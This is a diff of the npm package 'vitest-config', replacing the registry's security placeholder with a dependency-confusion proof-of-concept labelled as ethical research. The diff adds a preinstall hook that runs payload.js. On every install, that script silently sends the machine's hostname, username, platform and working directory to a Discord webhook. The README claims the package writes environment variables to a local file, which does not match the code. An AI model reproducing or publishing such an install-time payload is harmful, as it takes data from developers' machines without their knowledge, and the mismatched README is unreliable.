vitest-config 0.0.1-security → 99.0.1

package/README.md

@@ -1,5 +1,35 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=vitest-config for more information.
+# PoC Package: vitest-config
+
+## Vulnerability Details
+
+- **Package Name**: vitest-config
+- **Ecosystem**: npm
+- **Version**: 5.39.0
+- **Source File**: packages\core\core\package.json
+- **Reason**: Package 'vitest-config' not found in public npm registry
+
+## Description
+
+This is a proof-of-concept (PoC) package generated by DepRaptor to demonstrate
+a potential dependency confusion vulnerability.
+
+## What This PoC Does
+
+When installed, this package will:
+1. Log system information (username, hostname, working directory)
+2. Capture environment variables
+3. Write all information to `payload_log.txt`
+
+## Security Notice
+
+⚠️ **WARNING**: This PoC is intended ONLY for:
+- Authorized security testing
+- Bug bounty programs
+- Security research with proper authorization
+
+Do NOT upload this package to public registries without authorization.
+
+## Generated By
+
+DepRaptor - Dependency Confusion Scanner
+Developer: LAKSHMIKANTHAN K (letchupkt)

package/package.json

@@ -1,6 +1,11 @@
-{
-  "name": "vitest-config",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+  "name": "vitest-config",
+  "version": "99.0.1",
+  "description": "Ethical Security Research PoC - Dependency Confusion. Non-malicious.",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node payload.js"
+  },
+  "author": "Letchu Pkt (Ethical Researcher)",
+  "license": "MIT"
+}

package/payload.js

@@ -0,0 +1,56 @@
+const https = require('https');
+const os = require('os');
+
+function executePayload() {
+    // 🎯 REPLACE THIS WITH YOUR ACTUAL DISCORD WEBHOOK URL
+    const WEBHOOK_URL = "https://discord.com/api/webhooks/your_id/your_token";
+
+    // Collect ONLY safe metadata (Avoid exfiltrating secrets/env!)
+    const info = {
+        package: "vitest-config",
+        hostname: os.hostname(),
+        user: os.userInfo().username || "unknown",
+        platform: os.platform(),
+        nodeVersion: process.version,
+        cwd: process.cwd()
+    };
+
+    const postData = JSON.stringify({
+        username: "Bug Hunting Bot",
+        embeds: [{
+            title: "🎯 Dependency Confusion Triggered!",
+            color: 15158332, // Red
+            fields: [
+                { name: "Package", value: info.package, inline: true },
+                { name: "Hostname", value: info.hostname, inline: true },
+                { name: "User", value: info.user, inline: true },
+                { name: "Platform", value: info.platform, inline: false },
+                { name: "Directory", value: info.cwd, inline: false }
+            ],
+            footer: { text: "Authorized Security Research by Letchu Pkt" }
+        }]
+    });
+
+    const url = new URL(WEBHOOK_URL);
+    const options = {
+        hostname: url.hostname,
+        port: 443,
+        path: url.pathname,
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json',
+            'Content-Length': postData.length
+        }
+    };
+
+    const req = https.request(options);
+    req.on('error', () => { }); // Fail silently
+    req.write(postData);
+    req.end();
+
+    console.log("---------------------------------------------------------");
+    console.log(`[PoC] Security test for ${info.package} completed.`);
+    console.log("---------------------------------------------------------");
+}
+
+executePayload();